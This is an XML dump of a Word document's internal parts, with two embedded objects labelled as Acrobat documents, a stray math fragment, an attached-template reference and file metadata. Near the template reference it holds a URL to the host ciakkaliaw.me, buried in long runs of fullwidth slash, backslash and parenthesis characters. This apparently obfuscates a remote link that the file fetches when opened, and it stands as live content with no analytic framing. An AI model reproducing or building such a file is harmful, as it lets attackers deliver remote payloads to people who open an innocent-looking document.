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559" w:rsidRDefault="00002FBE">
      <w:r>
        <w:object w:dxaOrig="7140" w:dyaOrig="101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.6pt;height:103.2pt" o:ole="">
            <v:imagedata r:id="rId4" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="AcroExch.Document.DC" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1826622944" r:id="rId5"/>
        </w:object>
      </w:r>
      <w:r>
        <w:object w:dxaOrig="7140" w:dyaOrig="10103">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:357pt;height:505.2pt" o:ole="">
            <v:imagedata r:id="rId6" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="AcroExch.Document.DC" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1826622945" r:id="rId7"/>
        </w:object>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>A=π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sectPr w:rsidR="005865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02FBE"/>
    <w:rsid w:val="00002FBE"/>
    <w:rsid w:val="005865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attachedTemplate r:id="rId1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F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&#65295;&#65340;&#65288;&#65288;&#65295;&#65340;&#65295;&#65340;&#65288;&#65288;&#65295;&#65340;&#65295;&#65340;&#65288;&#65288;&#65295;&#65340;&#65295;&#65340;&#65288;&#65288;&#65295;&#65340;&#65295;&#65340;&#65288;@ciakkaliaw.me/yrGu2s?&amp;&#65295;&#65340;&#65295;&#65340;&#65289;&#65289;&#65295;&#65340;&#65295;&#65340;&#65289;&#65289;&#65295;&#65340;&#65295;&#65340;&#65289;&#65289;&#65295;&#65340;&#65295;&#65340;&#65289;&#65289;&#65295;&#65340;&#65295;&#65340;&#65289;&#65289;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67</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Grizli777</Company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91974</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>91974</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-07T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-07T08:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>